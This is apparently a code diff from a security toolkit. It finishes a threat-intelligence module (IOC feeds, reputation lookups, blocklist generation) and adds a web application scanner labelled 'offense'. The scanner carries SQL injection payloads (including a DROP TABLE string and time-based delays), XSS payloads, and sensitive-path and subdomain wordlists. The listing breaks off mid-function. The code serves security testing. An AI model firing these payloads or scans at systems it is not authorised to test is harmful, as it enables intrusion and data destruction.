'by_severity': by_severity,
|
||||
'by_source': by_source
|
||||
}
|
||||
|
||||
# ── Feed Management ──────────────────────────────────────────────────
|
||||
|
||||
def add_feed(self, name: str, feed_type: str, url: str,
|
||||
api_key: str = "", interval_hours: int = 24) -> Dict:
|
||||
"""Add a threat intelligence feed."""
|
||||
feed = Feed(
|
||||
name=name, feed_type=feed_type, url=url,
|
||||
api_key=api_key, interval_hours=interval_hours
|
||||
)
|
||||
self.feeds.append(feed)
|
||||
self._save_feeds()
|
||||
return {'ok': True, 'feed': feed.to_dict()}
|
||||
|
||||
def remove_feed(self, feed_id: str) -> Dict:
|
||||
"""Remove feed by ID."""
|
||||
before = len(self.feeds)
|
||||
self.feeds = [
|
||||
f for f in self.feeds
|
||||
if hashlib.md5(f"{f.name}:{f.url}".encode()).hexdigest()[:12] != feed_id
|
||||
]
|
||||
if len(self.feeds) < before:
|
||||
self._save_feeds()
|
||||
return {'ok': True}
|
||||
return {'ok': False, 'error': 'Feed not found'}
|
||||
|
||||
def get_feeds(self) -> List[Dict]:
|
||||
"""List all feeds."""
|
||||
return [f.to_dict() for f in self.feeds]
|
||||
|
||||
def fetch_feed(self, feed_id: str) -> Dict:
|
||||
"""Fetch IOCs from a feed."""
|
||||
if not requests:
|
||||
return {'ok': False, 'error': 'requests library not available'}
|
||||
|
||||
feed = None
|
||||
for f in self.feeds:
|
||||
if hashlib.md5(f"{f.name}:{f.url}".encode()).hexdigest()[:12] == feed_id:
|
||||
feed = f
|
||||
break
|
||||
if not feed:
|
||||
return {'ok': False, 'error': 'Feed not found'}
|
||||
|
||||
try:
|
||||
headers = {}
|
||||
if feed.api_key:
|
||||
headers['Authorization'] = f'Bearer {feed.api_key}'
|
||||
headers['X-API-Key'] = feed.api_key
|
||||
|
||||
resp = requests.get(feed.url, headers=headers, timeout=30)
|
||||
resp.raise_for_status()
|
||||
|
||||
imported = 0
|
||||
if feed.feed_type == 'csv_url':
|
||||
result = self.bulk_import(resp.text, source=feed.name)
|
||||
imported = result['imported']
|
||||
elif feed.feed_type == 'json_url':
|
||||
data = resp.json()
|
||||
items = data if isinstance(data, list) else data.get('data', data.get('results', []))
|
||||
for item in items:
|
||||
if isinstance(item, str):
|
||||
self.add_ioc(item, source=feed.name)
|
||||
imported += 1
|
||||
elif isinstance(item, dict):
|
||||
val = item.get('value', item.get('indicator', item.get('ioc', '')))
|
||||
if val:
|
||||
self.add_ioc(
|
||||
val,
|
||||
ioc_type=item.get('type', None),
|
||||
source=feed.name,
|
||||
severity=item.get('severity', 'unknown'),
|
||||
description=item.get('description', ''),
|
||||
tags=item.get('tags', [])
|
||||
)
|
||||
imported += 1
|
||||
elif feed.feed_type == 'stix_file':
|
||||
data = resp.json()
|
||||
objects = data.get('objects', [])
|
||||
for obj in objects:
|
||||
if obj.get('type') == 'indicator':
|
||||
pattern = obj.get('pattern', '')
|
||||
# Extract value from STIX pattern
|
||||
m = re.search(r"=\s*'([^']+)'", pattern)
|
||||
if m:
|
||||
self.add_ioc(
|
||||
m.group(1), source=feed.name,
|
||||
description=obj.get('name', ''),
|
||||
tags=obj.get('labels', [])
|
||||
)
|
||||
imported += 1
|
||||
|
||||
feed.last_fetch = datetime.now(timezone.utc).isoformat()
|
||||
feed.ioc_count = imported
|
||||
self._save_feeds()
|
||||
|
||||
return {'ok': True, 'imported': imported, 'feed': feed.name}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
# ── Reputation Lookups ───────────────────────────────────────────────
|
||||
|
||||
def lookup_virustotal(self, value: str, api_key: str) -> Dict:
|
||||
"""Look up IOC on VirusTotal."""
|
||||
if not requests:
|
||||
return {'ok': False, 'error': 'requests library not available'}
|
||||
|
||||
ioc_type = self.detect_ioc_type(value)
|
||||
headers = {'x-apikey': api_key}
|
||||
|
||||
try:
|
||||
if ioc_type == 'ip':
|
||||
url = f'https://www.virustotal.com/api/v3/ip_addresses/{value}'
|
||||
elif ioc_type == 'domain':
|
||||
url = f'https://www.virustotal.com/api/v3/domains/{value}'
|
||||
elif ioc_type in ('hash_md5', 'hash_sha1', 'hash_sha256'):
|
||||
url = f'https://www.virustotal.com/api/v3/files/{value}'
|
||||
elif ioc_type == 'url':
|
||||
url_id = hashlib.sha256(value.encode()).hexdigest()
|
||||
url = f'https://www.virustotal.com/api/v3/urls/{url_id}'
|
||||
else:
|
||||
return {'ok': False, 'error': f'Unsupported type for VT lookup: {ioc_type}'}
|
||||
|
||||
resp = requests.get(url, headers=headers, timeout=15)
|
||||
if resp.status_code == 200:
|
||||
data = resp.json().get('data', {}).get('attributes', {})
|
||||
stats = data.get('last_analysis_stats', {})
|
||||
return {
|
||||
'ok': True,
|
||||
'value': value,
|
||||
'type': ioc_type,
|
||||
'malicious': stats.get('malicious', 0),
|
||||
'suspicious': stats.get('suspicious', 0),
|
||||
'harmless': stats.get('harmless', 0),
|
||||
'undetected': stats.get('undetected', 0),
|
||||
'reputation': data.get('reputation', 0),
|
||||
'source': 'virustotal'
|
||||
}
|
||||
elif resp.status_code == 404:
|
||||
return {'ok': True, 'value': value, 'message': 'Not found in VirusTotal'}
|
||||
else:
|
||||
return {'ok': False, 'error': f'VT API error: {resp.status_code}'}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
def lookup_abuseipdb(self, ip: str, api_key: str) -> Dict:
|
||||
"""Look up IP on AbuseIPDB."""
|
||||
if not requests:
|
||||
return {'ok': False, 'error': 'requests library not available'}
|
||||
|
||||
try:
|
||||
resp = requests.get(
|
||||
'https://api.abuseipdb.com/api/v2/check',
|
||||
params={'ipAddress': ip, 'maxAgeInDays': 90},
|
||||
headers={'Key': api_key, 'Accept': 'application/json'},
|
||||
timeout=15
|
||||
)
|
||||
if resp.status_code == 200:
|
||||
data = resp.json().get('data', {})
|
||||
return {
|
||||
'ok': True,
|
||||
'ip': ip,
|
||||
'abuse_score': data.get('abuseConfidenceScore', 0),
|
||||
'total_reports': data.get('totalReports', 0),
|
||||
'country': data.get('countryCode', ''),
|
||||
'isp': data.get('isp', ''),
|
||||
'domain': data.get('domain', ''),
|
||||
'is_public': data.get('isPublic', False),
|
||||
'source': 'abuseipdb'
|
||||
}
|
||||
return {'ok': False, 'error': f'AbuseIPDB error: {resp.status_code}'}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
# ── Correlation ──────────────────────────────────────────────────────
|
||||
|
||||
def correlate_network(self, connections: List[Dict]) -> List[Dict]:
|
||||
"""Check network connections against IOC database."""
|
||||
ioc_ips = {ioc.value for ioc in self.iocs if ioc.ioc_type == 'ip' and ioc.active}
|
||||
ioc_domains = {ioc.value for ioc in self.iocs if ioc.ioc_type == 'domain' and ioc.active}
|
||||
|
||||
matches = []
|
||||
for conn in connections:
|
||||
remote_ip = conn.get('remote_addr', conn.get('ip', ''))
|
||||
remote_host = conn.get('hostname', '')
|
||||
|
||||
if remote_ip in ioc_ips:
|
||||
ioc = next(i for i in self.iocs if i.value == remote_ip)
|
||||
matches.append({
|
||||
'connection': conn,
|
||||
'ioc': ioc.to_dict(),
|
||||
'match_type': 'ip',
|
||||
'severity': ioc.severity
|
||||
})
|
||||
if remote_host and remote_host in ioc_domains:
|
||||
ioc = next(i for i in self.iocs if i.value == remote_host)
|
||||
matches.append({
|
||||
'connection': conn,
|
||||
'ioc': ioc.to_dict(),
|
||||
'match_type': 'domain',
|
||||
'severity': ioc.severity
|
||||
})
|
||||
|
||||
if matches:
|
||||
self.alerts.extend([{
|
||||
'timestamp': datetime.now(timezone.utc).isoformat(),
|
||||
'type': 'network_match',
|
||||
**m
|
||||
} for m in matches])
|
||||
|
||||
return matches
|
||||
|
||||
def correlate_file_hashes(self, hashes: List[str]) -> List[Dict]:
|
||||
"""Check file hashes against IOC database."""
|
||||
hash_iocs = {
|
||||
ioc.value.lower(): ioc
|
||||
for ioc in self.iocs
|
||||
if ioc.ioc_type.startswith('hash_') and ioc.active
|
||||
}
|
||||
|
||||
matches = []
|
||||
for h in hashes:
|
||||
if h.lower() in hash_iocs:
|
||||
ioc = hash_iocs[h.lower()]
|
||||
matches.append({
|
||||
'hash': h,
|
||||
'ioc': ioc.to_dict(),
|
||||
'severity': ioc.severity
|
||||
})
|
||||
|
||||
return matches
|
||||
|
||||
# ── Blocklist Generation ─────────────────────────────────────────────
|
||||
|
||||
def generate_blocklist(self, fmt: str = 'plain', ioc_type: str = 'ip',
|
||||
min_severity: str = 'low') -> str:
|
||||
"""Generate blocklist from IOCs."""
|
||||
severity_order = ['info', 'low', 'medium', 'high', 'critical']
|
||||
min_idx = severity_order.index(min_severity) if min_severity in severity_order else 0
|
||||
|
||||
items = []
|
||||
for ioc in self.iocs:
|
||||
if not ioc.active or ioc.ioc_type != ioc_type:
|
||||
continue
|
||||
sev_idx = severity_order.index(ioc.severity) if ioc.severity in severity_order else -1
|
||||
if sev_idx >= min_idx:
|
||||
items.append(ioc.value)
|
||||
|
||||
if fmt == 'iptables':
|
||||
return '\n'.join(f'iptables -A INPUT -s {ip} -j DROP' for ip in items)
|
||||
elif fmt == 'nginx_deny':
|
||||
return '\n'.join(f'deny {ip};' for ip in items)
|
||||
elif fmt == 'hosts':
|
||||
return '\n'.join(f'0.0.0.0 {d}' for d in items)
|
||||
elif fmt == 'dns_blocklist':
|
||||
return '\n'.join(items)
|
||||
elif fmt == 'snort':
|
||||
return '\n'.join(
|
||||
f'alert ip {ip} any -> $HOME_NET any (msg:"AUTARCH IOC match {ip}"; sid:{i+1000000}; rev:1;)'
|
||||
for i, ip in enumerate(items)
|
||||
)
|
||||
else: # plain
|
||||
return '\n'.join(items)
|
||||
|
||||
def get_alerts(self, limit: int = 100) -> List[Dict]:
|
||||
"""Get recent correlation alerts."""
|
||||
return self.alerts[-limit:]
|
||||
|
||||
def clear_alerts(self):
|
||||
"""Clear all alerts."""
|
||||
self.alerts.clear()
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
|
||||
def get_threat_intel() -> ThreatIntelEngine:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
_instance = ThreatIntelEngine()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI Interface ────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""CLI entry point for Threat Intel module."""
|
||||
engine = get_threat_intel()
|
||||
|
||||
while True:
|
||||
stats = engine.get_stats()
|
||||
print(f"\n{'='*60}")
|
||||
print(f" Threat Intelligence ({stats['total']} IOCs, {len(engine.feeds)} feeds)")
|
||||
print(f"{'='*60}")
|
||||
print()
|
||||
print(" 1 — Add IOC")
|
||||
print(" 2 — Search IOCs")
|
||||
print(" 3 — Bulk Import")
|
||||
print(" 4 — Export IOCs")
|
||||
print(" 5 — Manage Feeds")
|
||||
print(" 6 — Reputation Lookup")
|
||||
print(" 7 — Generate Blocklist")
|
||||
print(" 8 — View Stats")
|
||||
print(" 9 — View Alerts")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" > ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
value = input(" IOC value: ").strip()
|
||||
if value:
|
||||
ioc_type = input(f" Type (auto-detected: {engine.detect_ioc_type(value)}): ").strip()
|
||||
severity = input(" Severity (critical/high/medium/low/info): ").strip() or 'unknown'
|
||||
desc = input(" Description: ").strip()
|
||||
result = engine.add_ioc(value, ioc_type=ioc_type or None,
|
||||
severity=severity, description=desc)
|
||||
print(f" {result['action']}: {result['ioc']['value']} ({result['ioc']['ioc_type']})")
|
||||
elif choice == '2':
|
||||
search = input(" Search term: ").strip()
|
||||
results = engine.get_iocs(search=search)
|
||||
print(f" Found {len(results)} IOCs:")
|
||||
for ioc in results[:20]:
|
||||
print(f" [{ioc['severity']:<8}] {ioc['ioc_type']:<12} {ioc['value']}")
|
||||
elif choice == '3':
|
||||
print(" Paste IOCs (one per line, Ctrl+D/blank line to finish):")
|
||||
lines = []
|
||||
while True:
|
||||
try:
|
||||
line = input()
|
||||
if not line:
|
||||
break
|
||||
lines.append(line)
|
||||
except EOFError:
|
||||
break
|
||||
if lines:
|
||||
result = engine.bulk_import('\n'.join(lines))
|
||||
print(f" Imported: {result['imported']}, Skipped: {result['skipped']}")
|
||||
elif choice == '4':
|
||||
fmt = input(" Format (json/csv/stix): ").strip() or 'json'
|
||||
output = engine.export_iocs(fmt=fmt)
|
||||
outfile = os.path.join(engine.data_dir, f'export.{fmt}')
|
||||
with open(outfile, 'w') as f:
|
||||
f.write(output)
|
||||
print(f" Exported to {outfile}")
|
||||
elif choice == '5':
|
||||
print(f" Feeds ({len(engine.feeds)}):")
|
||||
for f in engine.get_feeds():
|
||||
print(f" {f['name']} ({f['feed_type']}) — last: {f['last_fetch'] or 'never'}")
|
||||
elif choice == '6':
|
||||
value = input(" Value to look up: ").strip()
|
||||
api_key = input(" VirusTotal API key: ").strip()
|
||||
if value and api_key:
|
||||
result = engine.lookup_virustotal(value, api_key)
|
||||
if result['ok']:
|
||||
print(f" Malicious: {result.get('malicious', 'N/A')} | "
|
||||
f"Suspicious: {result.get('suspicious', 'N/A')}")
|
||||
else:
|
||||
print(f" Error: {result.get('error', result.get('message'))}")
|
||||
elif choice == '7':
|
||||
fmt = input(" Format (plain/iptables/nginx_deny/hosts/snort): ").strip() or 'plain'
|
||||
ioc_type = input(" IOC type (ip/domain): ").strip() or 'ip'
|
||||
output = engine.generate_blocklist(fmt=fmt, ioc_type=ioc_type)
|
||||
print(f" Generated {len(output.splitlines())} rules")
|
||||
elif choice == '8':
|
||||
print(f" Total IOCs: {stats['total']}")
|
||||
print(f" Active: {stats['active']}")
|
||||
print(f" By type: {stats['by_type']}")
|
||||
print(f" By severity: {stats['by_severity']}")
|
||||
elif choice == '9':
|
||||
alerts = engine.get_alerts()
|
||||
print(f" {len(alerts)} alerts:")
|
||||
for a in alerts[-10:]:
|
||||
print(f" [{a.get('severity', '?')}] {a.get('match_type')}: "
|
||||
f"{a.get('ioc', {}).get('value', '?')}")
|
||||
724
modules/webapp_scanner.py
Normal file
724
modules/webapp_scanner.py
Normal file
@ -0,0 +1,724 @@
|
||||
"""AUTARCH Web Application Scanner
|
||||
|
||||
Directory bruteforce, subdomain enumeration, vulnerability scanning (SQLi, XSS),
|
||||
header analysis, technology fingerprinting, SSL/TLS audit, and crawler.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Web application vulnerability scanner"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "offense"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import ssl
|
||||
import socket
|
||||
import hashlib
|
||||
import threading
|
||||
import subprocess
|
||||
from pathlib import Path
|
||||
from urllib.parse import urlparse, urljoin, quote
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Dict, List, Optional, Any, Set
|
||||
from datetime import datetime, timezone
|
||||
|
||||
try:
|
||||
from core.paths import find_tool, get_data_dir
|
||||
except ImportError:
|
||||
import shutil
|
||||
def find_tool(name):
|
||||
return shutil.which(name)
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
try:
|
||||
import requests
|
||||
from requests.exceptions import RequestException
|
||||
_HAS_REQUESTS = True
|
||||
except ImportError:
|
||||
_HAS_REQUESTS = False
|
||||
|
||||
|
||||
# ── Tech Fingerprints ─────────────────────────────────────────────────────────
|
||||
|
||||
TECH_SIGNATURES = {
|
||||
'WordPress': {'headers': [], 'body': ['wp-content', 'wp-includes', 'wp-json'], 'cookies': ['wordpress_']},
|
||||
'Drupal': {'headers': ['X-Drupal-'], 'body': ['Drupal.settings', 'sites/default'], 'cookies': ['SESS']},
|
||||
'Joomla': {'headers': [], 'body': ['/media/jui/', 'com_content'], 'cookies': []},
|
||||
'Laravel': {'headers': [], 'body': ['laravel_session'], 'cookies': ['laravel_session']},
|
||||
'Django': {'headers': [], 'body': ['csrfmiddlewaretoken', '__admin__'], 'cookies': ['csrftoken', 'sessionid']},
|
||||
'Express': {'headers': ['X-Powered-By: Express'], 'body': [], 'cookies': ['connect.sid']},
|
||||
'ASP.NET': {'headers': ['X-AspNet-Version', 'X-Powered-By: ASP.NET'], 'body': ['__VIEWSTATE', '__EVENTVALIDATION'], 'cookies': ['ASP.NET_SessionId']},
|
||||
'PHP': {'headers': ['X-Powered-By: PHP'], 'body': ['.php'], 'cookies': ['PHPSESSID']},
|
||||
'Nginx': {'headers': ['Server: nginx'], 'body': [], 'cookies': []},
|
||||
'Apache': {'headers': ['Server: Apache'], 'body': [], 'cookies': []},
|
||||
'IIS': {'headers': ['Server: Microsoft-IIS'], 'body': [], 'cookies': []},
|
||||
'Cloudflare': {'headers': ['Server: cloudflare', 'cf-ray'], 'body': [], 'cookies': ['__cfduid']},
|
||||
'React': {'headers': [], 'body': ['react-root', '_reactRootContainer', 'data-reactroot'], 'cookies': []},
|
||||
'Angular': {'headers': [], 'body': ['ng-app', 'ng-controller', 'angular.min.js'], 'cookies': []},
|
||||
'Vue.js': {'headers': [], 'body': ['vue.min.js', 'v-bind:', 'v-if=', '__vue__'], 'cookies': []},
|
||||
'jQuery': {'headers': [], 'body': ['jquery.min.js', 'jquery-'], 'cookies': []},
|
||||
'Bootstrap': {'headers': [], 'body': ['bootstrap.min.css', 'bootstrap.min.js'], 'cookies': []},
|
||||
}
|
||||
|
||||
SECURITY_HEADERS = [
|
||||
'Content-Security-Policy',
|
||||
'X-Content-Type-Options',
|
||||
'X-Frame-Options',
|
||||
'X-XSS-Protection',
|
||||
'Strict-Transport-Security',
|
||||
'Referrer-Policy',
|
||||
'Permissions-Policy',
|
||||
'Cross-Origin-Opener-Policy',
|
||||
'Cross-Origin-Resource-Policy',
|
||||
'Cross-Origin-Embedder-Policy',
|
||||
]
|
||||
|
||||
# Common directories for bruteforce
|
||||
DIR_WORDLIST_SMALL = [
|
||||
'admin', 'login', 'wp-admin', 'administrator', 'phpmyadmin', 'cpanel',
|
||||
'dashboard', 'api', 'backup', 'config', 'db', 'debug', 'dev', 'docs',
|
||||
'dump', 'env', 'git', 'hidden', 'include', 'internal', 'log', 'logs',
|
||||
'old', 'panel', 'private', 'secret', 'server-status', 'shell', 'sql',
|
||||
'staging', 'status', 'temp', 'test', 'tmp', 'upload', 'uploads',
|
||||
'wp-content', 'wp-includes', '.env', '.git', '.htaccess', '.htpasswd',
|
||||
'robots.txt', 'sitemap.xml', 'crossdomain.xml', 'web.config',
|
||||
'composer.json', 'package.json', '.svn', '.DS_Store',
|
||||
'cgi-bin', 'server-info', 'info.php', 'phpinfo.php', 'xmlrpc.php',
|
||||
'wp-login.php', '.well-known', 'favicon.ico', 'humans.txt',
|
||||
]
|
||||
|
||||
# SQLi test payloads
|
||||
SQLI_PAYLOADS = [
|
||||
"'", "\"", "' OR '1'='1", "\" OR \"1\"=\"1",
|
||||
"' OR 1=1--", "\" OR 1=1--", "'; DROP TABLE--",
|
||||
"1' AND '1'='1", "1 AND 1=1", "1 UNION SELECT NULL--",
|
||||
"' UNION SELECT NULL,NULL--", "1'; WAITFOR DELAY '0:0:5'--",
|
||||
"1' AND SLEEP(5)--",
|
||||
]
|
||||
|
||||
# XSS test payloads
|
||||
XSS_PAYLOADS = [
|
||||
'<script>alert(1)</script>',
|
||||
'"><script>alert(1)</script>',
|
||||
"'><script>alert(1)</script>",
|
||||
'<img src=x onerror=alert(1)>',
|
||||
'<svg onload=alert(1)>',
|
||||
'"><img src=x onerror=alert(1)>',
|
||||
"javascript:alert(1)",
|
||||
'<body onload=alert(1)>',
|
||||
]
|
||||
|
||||
# SQL error signatures
|
||||
SQL_ERRORS = [
|
||||
'sql syntax', 'mysql_fetch', 'mysql_num_rows', 'mysql_query',
|
||||
'pg_query', 'pg_exec', 'sqlite3', 'SQLSTATE',
|
||||
'ORA-', 'Microsoft OLE DB', 'Unclosed quotation mark',
|
||||
'ODBC Microsoft Access', 'JET Database', 'Microsoft SQL Server',
|
||||
'java.sql.SQLException', 'PostgreSQL query failed',
|
||||
'supplied argument is not a valid MySQL', 'unterminated quoted string',
|
||||
]
|
||||
|
||||
|
||||
# ── Scanner Service ───────────────────────────────────────────────────────────
|
||||
|
||||
class WebAppScanner:
|
||||
"""Web application vulnerability scanner."""
|
||||
|
||||
def __init__(self):
|
||||
self._data_dir = os.path.join(get_data_dir(), 'webapp_scanner')
|
||||
self._results_dir = os.path.join(self._data_dir, 'results')
|
||||
os.makedirs(self._results_dir, exist_ok=True)
|
||||
self._active_jobs: Dict[str, dict] = {}
|
||||
self._session = None
|
||||
|
||||
def _get_session(self):
|
||||
if not _HAS_REQUESTS:
|
||||
raise RuntimeError('requests library required')
|
||||
if not self._session:
|
||||
self._session = requests.Session()
|
||||
self._session.headers.update({
|
||||
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '
|
||||
'AppleWebKit/537.36 (KHTML, like Gecko) '
|
||||
'Chrome/120.0.0.0 Safari/537.36',
|
||||
})
|
||||
self._session.verify = False
|
||||
return self._session
|
||||
|
||||
# ── Quick Scan ────────────────────────────────────────────────────────
|
||||
|
||||
def quick_scan(self, url: str) -> dict:
|
||||
"""Run a quick scan — headers, tech fingerprint, basic checks."""
|
||||
if not _HAS_REQUESTS:
|
||||
return {'ok': False, 'error': 'requests library required'}
|
||||
url = self._normalize_url(url)
|
||||
results = {
|
||||
'url': url,
|
||||
'scan_time': datetime.now(timezone.utc).isoformat(),
|
||||
'headers': {},
|
||||
'security_headers': {},
|
||||
'technologies': [],
|
||||
'server': '',
|
||||
'status_code': 0,
|
||||
'redirects': [],
|
||||
'ssl': {},
|
||||
}
|
||||
|
||||
try:
|
||||
sess = self._get_session()
|
||||
resp = sess.get(url, timeout=10, allow_redirects=True)
|
||||
results['status_code'] = resp.status_code
|
||||
results['headers'] = dict(resp.headers)
|
||||
results['server'] = resp.headers.get('Server', '')
|
||||
|
||||
# Track redirects
|
||||
for r in resp.history:
|
||||
results['redirects'].append({
|
||||
'url': r.url,
|
||||
'status': r.status_code,
|
||||
})
|
||||
|
||||
# Security headers
|
||||
results['security_headers'] = self._check_security_headers(resp.headers)
|
||||
|
||||
# Technology fingerprint
|
||||
results['technologies'] = self._fingerprint_tech(resp)
|
||||
|
||||
# SSL check
|
||||
parsed = urlparse(url)
|
||||
if parsed.scheme == 'https':
|
||||
results['ssl'] = self._check_ssl(parsed.hostname, parsed.port or 443)
|
||||
|
||||
except Exception as e:
|
||||
results['error'] = str(e)
|
||||
|
||||
return results
|
||||
|
||||
# ── Directory Bruteforce ──────────────────────────────────────────────
|
||||
|
||||
def dir_bruteforce(self, url: str, wordlist: List[str] = None,
|
||||
extensions: List[str] = None,
|
||||
threads: int = 10, timeout: float = 5.0) -> dict:
|
||||
"""Directory bruteforce scan."""
|
||||
if not _HAS_REQUESTS:
|
||||
return {'ok': False, 'error': 'requests library required'}
|
||||
|
||||
url = self._normalize_url(url).rstrip('/')
|
||||
if not wordlist:
|
||||
wordlist = DIR_WORDLIST_SMALL
|
||||
if not extensions:
|
||||
extensions = ['']
|
||||
|
||||
job_id = f'dirbust_{int(time.time())}'
|
||||
holder = {'done': False, 'found': [], 'tested': 0,
|
||||
'total': len(wordlist) * len(extensions)}
|
||||
self._active_jobs[job_id] = holder
|
||||
|
||||
def do_scan():
|
||||
sess = self._get_session()
|
||||
results_lock = threading.Lock()
|
||||
|
||||
def test_path(path):
|
||||
for ext in extensions:
|
||||
full_path = f'{path}{ext}' if ext else path
|
||||
test_url = f'{url}/{full_path}'
|
||||
try:
|
||||
r = sess.get(test_url, timeout=timeout,
|
||||
allow_redirects=False)
|
||||
holder['tested'] += 1
|
||||
if r.status_code not in (404, 403, 500):
|
||||
with results_lock:
|
||||
holder['found'].append({
|
||||
'path': '/' + full_path,
|
||||
'status': r.status_code,
|
||||
'size': len(r.content),
|
||||
'content_type': r.headers.get('Content-Type', ''),
|
||||
})
|
||||
except Exception:
|
||||
holder['tested'] += 1
|
||||
|
||||
threads_list = []
|
||||
for word in wordlist:
|
||||
t = threading.Thread(target=test_path, args=(word,), daemon=True)
|
||||
threads_list.append(t)
|
||||
t.start()
|
||||
if len(threads_list) >= threads:
|
||||
for t in threads_list:
|
||||
t.join(timeout=timeout + 5)
|
||||
threads_list.clear()
|
||||
for t in threads_list:
|
||||
t.join(timeout=timeout + 5)
|
||||
holder['done'] = True
|
||||
|
||||
threading.Thread(target=do_scan, daemon=True).start()
|
||||
return {'ok': True, 'job_id': job_id}
|
||||
|
||||
# ── Subdomain Enumeration ─────────────────────────────────────────────
|
||||
|
||||
def subdomain_enum(self, domain: str, wordlist: List[str] = None,
|
||||
use_ct: bool = True) -> dict:
|
||||
"""Enumerate subdomains via DNS bruteforce and CT logs."""
|
||||
found = []
|
||||
|
||||
# Certificate Transparency logs
|
||||
if use_ct and _HAS_REQUESTS:
|
||||
try:
|
||||
resp = requests.get(
|
||||
f'https://crt.sh/?q=%.{domain}&output=json',
|
||||
timeout=15)
|
||||
if resp.status_code == 200:
|
||||
for entry in resp.json():
|
||||
name = entry.get('name_value', '')
|
||||
for sub in name.split('\n'):
|
||||
sub = sub.strip().lower()
|
||||
if sub.endswith('.' + domain) and sub not in found:
|
||||
found.append(sub)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# DNS bruteforce
|
||||
if not wordlist:
|
||||
wordlist = ['www', 'mail', 'ftp', 'admin', 'api', 'dev',
|
||||
'staging', 'test', 'blog', 'shop', 'app', 'cdn',
|
||||
'ns1', 'ns2', 'mx', 'smtp', 'imap', 'pop',
|
||||
'vpn', 'remote', 'portal', 'webmail', 'secure',
|
||||
'beta', 'demo', 'docs', 'git', 'jenkins', 'ci',
|
||||
'grafana', 'kibana', 'prometheus', 'monitor',
|
||||
'status', 'support', 'help', 'forum', 'wiki',
|
||||
'internal', 'intranet', 'proxy', 'gateway']
|
||||
|
||||
for sub in wordlist:
|
||||
fqdn = f'{sub}.{domain}'
|
||||
try:
|
||||
socket.getaddrinfo(fqdn, None)
|
||||
if fqdn not in found:
|
||||
found.append(fqdn)
|
||||
except socket.gaierror:
|
||||
pass
|
||||
|
||||
return {'ok': True, 'domain': domain, 'subdomains': sorted(set(found)),
|
||||
'count': len(set(found))}
|
||||
|
||||
# ── Vulnerability Scanning ────────────────────────────────────────────
|
||||
|
||||
def vuln_scan(self, url: str, scan_sqli: bool = True,
|
||||
scan_xss: bool = True) -> dict:
|
||||
"""Scan for SQL injection and XSS vulnerabilities."""
|
||||
if not _HAS_REQUESTS:
|
||||
return {'ok': False, 'error': 'requests library required'}
|
||||
|
||||
url = self._normalize_url(url)
|
||||
findings = []
|
||||
sess = self._get_session()
|
||||
|
||||
# Crawl to find forms and parameters
|
||||
try:
|
||||
resp = sess.get(url, timeout=10)
|
||||
body = resp.text
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
# Find URLs with parameters
|
||||
param_urls = self._extract_param_urls(body, url)
|
||||
|
||||
# Test each URL with parameters
|
||||
for test_url in param_urls[:20]: # Limit to prevent abuse
|
||||
parsed = urlparse(test_url)
|
||||
params = dict(p.split('=', 1) for p in parsed.query.split('&')
|
||||
if '=' in p) if parsed.query else {}
|
||||
|
||||
for param_name, param_val in params.items():
|
||||
if scan_sqli:
|
||||
sqli_findings = self._test_sqli(sess, test_url, param_name, param_val)
|
||||
findings.extend(sqli_findings)
|
||||
|
||||
if scan_xss:
|
||||
xss_findings = self._test_xss(sess, test_url, param_name, param_val)
|
||||
findings.extend(xss_findings)
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'url': url,
|
||||
'findings': findings,
|
||||
'urls_tested': len(param_urls[:20]),
|
||||
}
|
||||
|
||||
def _test_sqli(self, sess, url: str, param: str, original_val: str) -> List[dict]:
|
||||
"""Test a parameter for SQL injection."""
|
||||
findings = []
|
||||
parsed = urlparse(url)
|
||||
base_params = dict(p.split('=', 1) for p in parsed.query.split('&')
|
||||
if '=' in p) if parsed.query else {}
|
||||
|
||||
for payload in SQLI_PAYLOADS[:6]: # Limit payloads
|
||||
test_params = base_params.copy()
|
||||
test_params[param] = original_val + payload
|
||||
try:
|
||||
test_url = f'{parsed.scheme}://{parsed.netloc}{parsed.path}'
|
||||
r = sess.get(test_url, params=test_params, timeout=5)
|
||||
body = r.text.lower()
|
||||
|
||||
for error_sig in SQL_ERRORS:
|
||||
if error_sig.lower() in body:
|
||||
findings.append({
|
||||
'type': 'sqli',
|
||||
'severity': 'high',
|
||||
'url': url,
|
||||
'parameter': param,
|
||||
'payload': payload,
|
||||
'evidence': error_sig,
|
||||
'description': f'SQL injection (error-based) in parameter "{param}"',
|
||||
})
|
||||
return findings # One finding per param is enough
|
||||
except Exception:
|
||||
continue
|
||||
|
||||
return findings
|
||||
|
||||
def _test_xss(self, sess, url: str, param: str, original_val: str) -> List[dict]:
|
||||
"""Test a parameter for reflected XSS."""
|
||||
findings = []
|
||||
parsed = urlparse(url)
|
||||
base_params = dict(p.split('=', 1) for p in parsed.query.split('&')
|
||||
if '=' in p) if parsed.query else {}
|
||||
|
||||
for payload in XSS_PAYLOADS[:4]:
|
||||
test_params = base_params.copy()
|
||||
test_params[param] = payload
|
||||
try:
|
||||
test_url = f'{parsed.scheme}://{parsed.netloc}{parsed.path}'
|
||||
r = sess.get(test_url, params=test_params, timeout=5)
|
||||
if payload in r.text:
|
||||
findings.append({
|
||||
'type': 'xss',
|
||||
'severity': 'high',
|
||||
'url': url,
|
||||
'parameter': param,
|
||||
'payload': payload,
|
||||
